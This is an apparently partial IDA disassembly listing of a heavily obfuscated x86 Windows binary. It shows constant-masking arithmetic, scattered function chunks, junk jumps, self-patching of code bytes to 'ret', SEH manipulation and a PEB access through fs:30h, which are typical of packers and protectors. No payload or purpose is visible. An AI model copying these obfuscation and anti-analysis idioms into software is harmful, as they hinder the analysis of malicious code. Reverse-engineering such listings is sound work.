
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_400. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7F7

loc_4592D5:				; CODE XREF: sub_45A7F7+6j
		jmp	nullsub_337
; END OF FUNCTION CHUNK	FOR sub_45A7F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45596A

loc_4592DA:				; CODE XREF: sub_45596A-172B7j
		jmp	loc_43E5D0
; END OF FUNCTION CHUNK	FOR sub_45596A
; ---------------------------------------------------------------------------
		mov	[esi], ebx
		jnb	loc_44B73C
		jmp	loc_454BCB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_251. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CB02

loc_4592ED:				; CODE XREF: sub_43CB02+1E1C7j
		jmp	nullsub_352
; END OF FUNCTION CHUNK	FOR sub_43CB02
; ---------------------------------------------------------------------------

loc_4592F2:				; DATA XREF: sub_43B163:loc_443EFFo
		xchg	ebp, [esp]
		push	1BCA8D4Eh
		pop	ebx
		rol	ebx, 0Ah
		or	ebx, 134DEF39h
		and	ebx, 50B433BFh
		xor	ebx, 10343323h
		xchg	ebx, [esp]
		jmp	loc_455D98

; =============== S U B	R O U T	I N E =======================================



sub_459318	proc near		; CODE XREF: y2kk37jd:0044C3FAj
					; sub_45B7AA:loc_45BEF5p
		xchg	esi, [esp+0]
		pop	esi
		lea	eax, nullsub_497

loc_459322:				; CODE XREF: y2kk37jd:loc_448CF6j
		push	offset sub_44DBB3
		jmp	loc_43FABD
sub_459318	endp

; ---------------------------------------------------------------------------
		push	855776C6h
		jmp	loc_43F8B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_459336:				; CODE XREF: sub_43C054-F0Fj
		pop	eax
		rol	eax, 1Bh

loc_45933A:				; CODE XREF: sub_44AAA1-2E0Bj
		or	eax, 0F1EEDB2h
		xor	eax, 9FD80325h
		add	eax, 0DFFC794Ah
		mov	eax, [eax]
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		jmp	loc_4431A4
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------
		push	offset sub_4418BA
		jmp	loc_4441A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E648

loc_459363:				; CODE XREF: sub_44E648+Aj
		xchg	ebp, [esp+0]
		push	edx
		pop	edi
		call	sub_44C922

loc_45936D:				; CODE XREF: y2kk37jd:00446F45j
		jmp	loc_44C008
; END OF FUNCTION CHUNK	FOR sub_44E648
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_459372:				; CODE XREF: sub_43BA66+3A2Ej
		push	offset loc_45B099
		jmp	loc_451A07
; END OF FUNCTION CHUNK	FOR sub_43BA66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45937C:				; CODE XREF: sub_445226:loc_4438ACj
		xor	edx, 961DF50Ah
		test	edx, 8
		jmp	loc_44F8B2
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		jmp	ds:off_41E078
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_459393:				; CODE XREF: sub_4553C1-B5DAj
		jmp	loc_454E87
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449775

loc_459398:				; CODE XREF: sub_449775-2053j
		jmp	nullsub_273
; END OF FUNCTION CHUNK	FOR sub_449775
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453849

loc_45939D:				; CODE XREF: sub_453849-719Ej
					; sub_448700:loc_45734Dj ...
		jb	loc_43B788
		call	sub_44C224

loc_4593A8:				; CODE XREF: sub_44AC89+79C2j
		jmp	loc_444369
; END OF FUNCTION CHUNK	FOR sub_453849
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A089

loc_4593AD:				; CODE XREF: sub_45A089:loc_45A090j
		call	sub_454B2D
; END OF FUNCTION CHUNK	FOR sub_45A089
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4593B2:				; CODE XREF: sub_43C851+155BFj
		jmp	nullsub_281
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ECA8

loc_4593B7:				; CODE XREF: sub_44ECA8+16j
		jmp	loc_440284
; END OF FUNCTION CHUNK	FOR sub_44ECA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441222

loc_4593BC:				; CODE XREF: sub_441222+Cj
		jmp	loc_444C56
; END OF FUNCTION CHUNK	FOR sub_441222
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_4593C1:				; CODE XREF: sub_456809:loc_44B16Ej
		pop	esi
		sub	esi, 0B87AB09Fh
		add	esi, 5BDEAF58h
		rol	esi, 0Eh
		xor	esi, 0B028895h
		jmp	loc_440CC7
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_4593DC:				; CODE XREF: y2kk37jd:00448DF7j
		and	eax, 0B7B8257Fh
		add	eax, 0FE1B9EA0h
		xchg	eax, [esp]
		jmp	loc_4510CC
; ---------------------------------------------------------------------------
		sub	esi, edx
		jmp	sub_45AD8D
; ---------------------------------------------------------------------------

loc_4593F7:				; CODE XREF: y2kk37jd:0043F7C0j
		popf

; =============== S U B	R O U T	I N E =======================================



sub_4593F8	proc near		; CODE XREF: sub_450C3A+5p

; FUNCTION CHUNK AT 0044053C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00447482 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453645 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0045C4BE SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	670764E0h
		pop	eax
		sub	eax, 5459BDC1h
		jmp	loc_45C4BE
sub_4593F8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45940D:				; CODE XREF: y2kk37jd:0045433Aj
		jz	loc_451989
; START	OF FUNCTION CHUNK FOR sub_445226

loc_459413:				; CODE XREF: sub_445226+A4CDj
		jmp	loc_43C547
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		and	esi, 706D11C6h
		jmp	loc_451982
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580C5

loc_459423:				; CODE XREF: sub_4580C5:loc_4580D3j
		jz	loc_4583E6
		jmp	loc_43CF56
; END OF FUNCTION CHUNK	FOR sub_4580C5
; ---------------------------------------------------------------------------

locret_45942E:				; CODE XREF: y2kk37jd:004488F7j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_45942F:				; CODE XREF: y2kk37jd:0044C293j
					; sub_43F346+15DD7j
		jnz	loc_446A61
		jmp	loc_456944
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_45943A:				; CODE XREF: sub_43B0F5+4141j
		push	offset sub_441E14
		jmp	nullsub_276
; END OF FUNCTION CHUNK	FOR sub_43B0F5

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_459444	proc near		; CODE XREF: sub_459724:loc_453DBFj
		retn
sub_459444	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EA0

loc_459445:				; CODE XREF: sub_443EA0+6j
		jmp	locret_459890
; END OF FUNCTION CHUNK	FOR sub_443EA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B7C

loc_45944A:				; CODE XREF: sub_440B7C+Cj
		jmp	loc_43D27C
; END OF FUNCTION CHUNK	FOR sub_440B7C
; ---------------------------------------------------------------------------

loc_45944F:				; CODE XREF: y2kk37jd:00457DCEj
		add	esi, 75E7C1DEh
		shl	esi, 17h
		pushf
		xchg	ecx, [ebx]

loc_45945B:				; CODE XREF: y2kk37jd:loc_459DC0j
		push	0
		call	sub_451843

loc_459462:				; CODE XREF: y2kk37jd:00444EFDj
		jmp	loc_44E473
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D33A

loc_459467:				; CODE XREF: sub_43D33A+Dj
		jmp	sub_4577FE
; END OF FUNCTION CHUNK	FOR sub_43D33A
; ---------------------------------------------------------------------------

loc_45946C:				; CODE XREF: y2kk37jd:00457C89j
		pop	edx
		sub	edx, 9799F532h
		jb	loc_45AFDD
		xchg	ecx, [ebp+0]
		xchg	eax, ebx
		mov	ebp, eax
		popf
		jmp	loc_45AFDB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4526B7

loc_459486:				; CODE XREF: sub_4526B7:loc_4526BDj
		call	sub_4581BB
; END OF FUNCTION CHUNK	FOR sub_4526B7
; START	OF FUNCTION CHUNK FOR sub_44438E

loc_45948B:				; CODE XREF: sub_44438E+4j
					; sub_4598BE-6E51j
		mov	eax, ds:dword_4470AC
		mov	[ebp-4], eax

loc_459493:				; CODE XREF: y2kk37jd:loc_44559Fj
		mov	eax, [ebp-4]
		mov	esp, ebp
		jmp	loc_4561EA
; END OF FUNCTION CHUNK	FOR sub_44438E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_91. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45949E:				; CODE XREF: y2kk37jd:0043BCB8j
		jmp	locret_442463
; ---------------------------------------------------------------------------
		add	eax, 6D28A2FFh
		cdq
		jmp	sub_45095F
; ---------------------------------------------------------------------------
		mov	eax, 4AC5B528h
		call	sub_442C3E
		push	edx
		push	122853BCh

loc_4594BF:				; CODE XREF: y2kk37jd:loc_458E16j
		pop	edx
		sub	edx, 0A6912992h
		xor	edx, 4960EF12h
		add	edx, 0DD4A1B48h
		jmp	loc_43BADF
; ---------------------------------------------------------------------------
		or	ebp, edx
		jmp	sub_448AAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F5E

loc_4594DE:				; CODE XREF: sub_445226:loc_456340j
					; sub_441F5E:loc_458D9Fj
		mov	edx, [ebp+0]
		cmp	esi, eax
		jmp	loc_44CFD9
; END OF FUNCTION CHUNK	FOR sub_441F5E
; ---------------------------------------------------------------------------

loc_4594E8:				; CODE XREF: y2kk37jd:loc_44D43Fj
		push	offset loc_454C67
		jmp	locret_43E315
; ---------------------------------------------------------------------------

loc_4594F2:				; DATA XREF: sub_44B924:loc_44DFDFo
		mov	eax, [ebp-4]
		call	sub_45B019
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jle	loc_456D49
		mov	eax, [ebp-4]
		xor	edx, edx
		push	offset sub_45B2D6
		jmp	locret_457F1D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_225. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E0B

loc_459517:				; CODE XREF: sub_455E0B-14C90j
		jmp	loc_44CE32
; END OF FUNCTION CHUNK	FOR sub_455E0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45951C:				; CODE XREF: sub_4411C3+13CA8j
		jb	loc_43BB44

loc_459522:				; CODE XREF: sub_4411C3:loc_4440BAj
		xor	edx, 22477232h
		add	edx, ebp
		add	edx, 0D2AE0C8h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_447D65
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_45953B:				; CODE XREF: sub_454539-1276Aj
		jz	loc_44A6A6
		jmp	loc_4406F7
; END OF FUNCTION CHUNK	FOR sub_454539

; =============== S U B	R O U T	I N E =======================================



sub_459546	proc near		; CODE XREF: y2kk37jd:0044ADFAj
					; sub_44001E+199F3p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00445FD2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00447E28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004509DE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00450B5F SIZE 0000000F BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		xor	edx, 407970B4h
		add	edx, ebp
		jmp	loc_447E28
sub_459546	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_459557:				; CODE XREF: y2kk37jd:0044EEA3j
		sub	eax, 0C6551286h
		xor	eax, 0FF9E1275h
		call	sub_442C3E
		push	edi
		push	58058806h
		pop	edi
		jmp	loc_440444
; ---------------------------------------------------------------------------

loc_459574:				; CODE XREF: y2kk37jd:0043D80Ej
		mov	edx, ebp
		xchg	edx, [esp]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_4452D0
; ---------------------------------------------------------------------------

loc_459583:				; DATA XREF: y2kk37jd:loc_441A8Co
		mov	[esi], eax
		pop	esi
		lea	eax, sub_441F30
		mov	byte ptr [eax],	0C3h
		jmp	loc_453DB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F30

loc_459594:				; CODE XREF: sub_441F30j
		pop	edx
		mov	eax, [esp-4+arg_0]
		jmp	loc_44EAD4
; END OF FUNCTION CHUNK	FOR sub_441F30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_45959D:				; CODE XREF: sub_446718:loc_440CCCj
		pop	ebx
		lea	eax, sub_43D0C9
		mov	byte ptr [eax],	0C3h
		jmp	loc_451570
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0C9

loc_4595AC:				; CODE XREF: sub_43D0C9j
		pop	edx
		mov	eax, [esp-4+arg_0]
		jmp	loc_44534C
; END OF FUNCTION CHUNK	FOR sub_43D0C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_4595B5:				; CODE XREF: sub_44D6A5-BEDCj
		pushf
		jmp	loc_457119
; END OF FUNCTION CHUNK	FOR sub_44D6A5
; ---------------------------------------------------------------------------
		test	esi, eax
		jmp	loc_459712
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4595C2:				; CODE XREF: sub_43C851+2676j
		jnz	loc_44657D

loc_4595C8:				; CODE XREF: sub_43F346:loc_44E48Bj
		jmp	loc_445C78
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
		xor	edx, 240FE568h
		jmp	loc_446579

; =============== S U B	R O U T	I N E =======================================



sub_4595D8	proc near		; CODE XREF: sub_44001E-1CDCp
					; y2kk37jd:00450B4Cj

; FUNCTION CHUNK AT 00440D4B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443BD8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CFB0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045260B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459F06 SIZE 00000016 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jnz	loc_445FDB
		jmp	loc_443BD8
sub_4595D8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_4595EE:				; CODE XREF: y2kk37jd:loc_44FB1Cj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_4595EF:				; CODE XREF: sub_4514DE-8024j
		jmp	loc_45AEA2
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_4595F4:				; CODE XREF: sub_454413:loc_43DB99j
		add	esi, ebp
		add	esi, 410EEC16h
		mov	[esi], eax
		pop	esi
		call	sub_44CA8F
		call	sub_45877C
		test	al, al
		jz	loc_44A86A
		jmp	loc_456953
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
		xor	edx, 172D6CA9h
		pushf
		jmp	sub_440A37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C638

loc_459622:				; CODE XREF: sub_43C638+14CB8j
		push	edx
		call	sub_4464B3
		push	0B9C8543Bh
		pop	eax
		or	eax, 0D07A3F3Fh
		jmp	loc_453A4D
; END OF FUNCTION CHUNK	FOR sub_43C638
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_459639:				; CODE XREF: sub_454D0F:loc_44A54Ej
		mov	esi, ecx
		pop	ecx
		add	esi, 0C56729DDh
		or	esi, 0BBE9C916h
		add	esi, 404BAC57h

loc_45964E:				; CODE XREF: sub_43F567+186C6j
		xchg	esi, [esp-4+arg_0]
		jmp	loc_4430B0
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_459657:				; CODE XREF: sub_44001E+91A0j
		jmp	loc_459CA1
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4436C1

loc_45965C:				; CODE XREF: sub_4436C1+15j
		jmp	loc_444011
; END OF FUNCTION CHUNK	FOR sub_4436C1
; ---------------------------------------------------------------------------

loc_459661:				; CODE XREF: y2kk37jd:loc_4485A8j
					; y2kk37jd:loc_455760j
		add	eax, 0AD88F903h
		push	edx
		push	offset sub_43B427
		jmp	loc_4494A3

; =============== S U B	R O U T	I N E =======================================



sub_459672	proc near		; CODE XREF: y2kk37jd:00441B69p
					; y2kk37jd:0044D7E5j

arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043B3D0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043DE4D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443121 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044423D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044582B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F4BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004561DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AE34 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edi
		mov	edi, edx
		jmp	loc_44F4BD
sub_459672	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FAC

loc_45967E:				; CODE XREF: sub_442FAC:loc_4513D6j
		add	ebx, 0B92A15D9h
		rol	ebx, 0Dh
		add	ebx, 0F3BD78C4h
		xchg	ebx, [esp+4+var_4]
		jmp	loc_4548F1
; END OF FUNCTION CHUNK	FOR sub_442FAC

; =============== S U B	R O U T	I N E =======================================



sub_459695	proc near		; CODE XREF: y2kk37jd:0044711Ep
					; y2kk37jd:00455F27j
		xchg	ebx, [esp+0]
		pop	ebx
		push	587DE090h
sub_459695	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_45969E:				; CODE XREF: sub_43E1E9:loc_4506F7j
		pop	edi
		or	edi, 3BFF7ADCh
		add	edi, 0E4BFA924h
		rol	edi, 14h
		jmp	loc_454D51
; END OF FUNCTION CHUNK	FOR sub_43E1E9
; ---------------------------------------------------------------------------

loc_4596B3:				; CODE XREF: y2kk37jd:0044C769j
		jz	loc_45AD24
		jmp	loc_45A5BE
; ---------------------------------------------------------------------------

loc_4596BE:				; CODE XREF: y2kk37jd:00454A10j
		jge	loc_453F53
; START	OF FUNCTION CHUNK FOR sub_454ED9

loc_4596C4:				; CODE XREF: sub_454ED9-10DA2j
		jmp	sub_45405E
; END OF FUNCTION CHUNK	FOR sub_454ED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C498

loc_4596C9:				; CODE XREF: sub_43C498+Cj
		jmp	loc_43B14A
; END OF FUNCTION CHUNK	FOR sub_43C498
; ---------------------------------------------------------------------------
		jnz	loc_458D6A
		add	ecx, 0F2DFF51Eh
		sub	ecx, edx
		xchg	ebp, [ecx]
		jmp	loc_453F53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_4596E3:				; CODE XREF: sub_443AA7+493j
		or	eax, 5DAE9D54h

loc_4596E9:				; CODE XREF: sub_443AA7:loc_44ECC3j
		pop	large dword ptr	fs:0
		add	esp, 4
		mov	eax, 50h
		jmp	loc_45B7C3
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------

loc_4596FD:				; CODE XREF: y2kk37jd:0043D583j
		add	eax, 0D2A65800h

; =============== S U B	R O U T	I N E =======================================



sub_459703	proc near		; CODE XREF: sub_44CD48-6C40p

; FUNCTION CHUNK AT 0045411A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045B414 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	ecx, 0DE43CEF2h
		jmp	loc_45B414
sub_459703	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_459712:				; CODE XREF: y2kk37jd:004595BDj
		js	loc_45474A

; =============== S U B	R O U T	I N E =======================================



sub_459718	proc near		; CODE XREF: y2kk37jd:00449E90p
		xchg	eax, [esp+0]
		pop	eax
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_482
sub_459718	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_459724	proc near		; CODE XREF: sub_40E632+234p
					; sub_4119EB+13p ...

; FUNCTION CHUNK AT 00453DBF SIZE 00000005 BYTES

		push	edi
		push	offset loc_44E686
		jmp	loc_453DBF
sub_459724	endp

; ---------------------------------------------------------------------------

loc_45972F:				; CODE XREF: y2kk37jd:0044707Bj
		jns	loc_44D480
		rol	edi, 6
		xchg	edx, ebp
		jmp	loc_44A1BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_45973F:				; CODE XREF: sub_43ED19:loc_4464D4j
					; y2kk37jd:004464E8j
		and	edx, 22AAA7D1h
		xor	edx, 8601A82Fh
		add	edx, ebp
		add	edx, 79D4D5FEh
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_445854
; END OF FUNCTION CHUNK	FOR sub_43ED19
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_71. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_45975F:				; CODE XREF: sub_44AC89:loc_44CF1Dj
		add	esp, 4
		retn
; END OF FUNCTION CHUNK	FOR sub_44AC89

; =============== S U B	R O U T	I N E =======================================



sub_459763	proc near		; CODE XREF: sub_44A298:loc_45A6F9p
		push	large dword ptr	fs:0
		mov	large fs:0, esp
		jmp	loc_443AB2
sub_459763	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B16

loc_459776:				; CODE XREF: sub_454B16-7D5Dj
		sub	edi, eax
		jmp	loc_4429F7
; END OF FUNCTION CHUNK	FOR sub_454B16

; =============== S U B	R O U T	I N E =======================================



sub_45977D	proc near		; CODE XREF: y2kk37jd:0043B918j
					; sub_43B1D6+948p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	edx, [esp-4+arg_0]
		jmp	sub_45405E
sub_45977D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_459789	proc near		; CODE XREF: sub_454C73+Ep
					; sub_44C2AE+A110j

; FUNCTION CHUNK AT 0043D933 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446C7C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044718C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447584 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0044DA3F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F4F0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044FC65 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004508A3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00451ADD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045467C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AEE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BF04 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	dword ptr [ebp-4]
		call	sub_45704E
		jmp	loc_447584
sub_459789	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45979A	proc near		; CODE XREF: sub_45A48Ep
					; sub_456D3F+48C7j
		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_4597AE
		jmp	ds:off_41E11C
sub_45979A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4597A9:				; CODE XREF: y2kk37jd:0043E290j
		jmp	nullsub_482

; =============== S U B	R O U T	I N E =======================================



sub_4597AE	proc near		; CODE XREF: sub_454C24:loc_444706j
					; y2kk37jd:004471DDj ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C1B3 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043CA69 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043E895 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00441130 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444640 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044487D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444C9C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004481C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D3DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C1BF SIZE 0000000E BYTES

		xchg	ebp, [esp+8+var_8]
		mov	edx, ebp
		pop	ebp
		jmp	loc_4481C2
sub_4597AE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:off_41E1B0, eax
		lea	eax, sub_43BD0D
		mov	byte ptr [eax],	0C3h
		jmp	sub_43BD0D
; ---------------------------------------------------------------------------
		push	esi
		push	0E3B7036h
		pop	esi
		sub	esi, 9A1139C7h
		jmp	loc_457948
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4597DF:				; CODE XREF: sub_43C851+7452j
		add	edx, 0BEC02937h
		popf
		call	sub_45BE7D

loc_4597EB:				; CODE XREF: sub_44E2B5+12j
		jmp	loc_445740
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44479B

loc_4597F0:				; CODE XREF: sub_44479B+10j
		jmp	loc_43D5A9
; END OF FUNCTION CHUNK	FOR sub_44479B
; ---------------------------------------------------------------------------

loc_4597F5:				; CODE XREF: y2kk37jd:loc_4461CAj
		cmp	esi, 0B3B071BDh
		jmp	loc_457C72

; =============== S U B	R O U T	I N E =======================================



sub_459800	proc near		; CODE XREF: sub_45B60B:loc_457315j
					; y2kk37jd:00457B6Bp
		push	ebp
		call	sub_43BDF4
sub_459800	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_118. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_459807:				; CODE XREF: y2kk37jd:004517BDj
		jmp	loc_458D76
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EA8

loc_45980C:				; CODE XREF: sub_446EA8+B2DFj
		add	ecx, ebp
		add	ecx, 0A682A20Ah
		mov	[ecx], eax
		pop	ecx
		mov	eax, [ebp-4]
		jmp	loc_450880
; END OF FUNCTION CHUNK	FOR sub_446EA8

; =============== S U B	R O U T	I N E =======================================



sub_45981F	proc near		; DATA XREF: sub_45B7AA:loc_45B7C3o

; FUNCTION CHUNK AT 0044E156 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00459D44 SIZE 00000006 BYTES

		call	sub_454413
		jmp	loc_44E156
sub_45981F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_459829:				; CODE XREF: y2kk37jd:0043FC49j
					; sub_44AC89-44FDj ...
		jb	loc_4569E9
		mov	eax, large fs:30h
		add	eax, 54h
		jmp	loc_43F577
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449F5B

loc_45983E:				; CODE XREF: sub_449F5B:loc_444F3Ej
		ror	eax, 0Eh
		push	edx
		push	offset sub_458CC4
		jmp	sub_456F5A
; END OF FUNCTION CHUNK	FOR sub_449F5B
; ---------------------------------------------------------------------------
		push	0A90A2997h
		pop	eax
		xor	eax, 0FA4CD278h
		add	eax, 9EB8CCFBh
		rol	eax, 8
		xor	eax, 826E4631h
		push	edi
		jmp	loc_456B03

; =============== S U B	R O U T	I N E =======================================



sub_45986D	proc near		; CODE XREF: y2kk37jd:0045035Ej
					; y2kk37jd:00458EB5p
		xchg	eax, [esp+0]
		pop	eax
		xor	[ebp-0Ah], al
		inc	dword ptr [ebp-8]
		inc	dword ptr [ebp-4]
		jmp	loc_44FA05
sub_45986D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45987F	proc near		; CODE XREF: sub_44D51F:loc_44F9FDp

; FUNCTION CHUNK AT 0043D969 SIZE 00000005 BYTES

		mov	eax, 5Eh
		jmp	loc_43D969
sub_45987F	endp

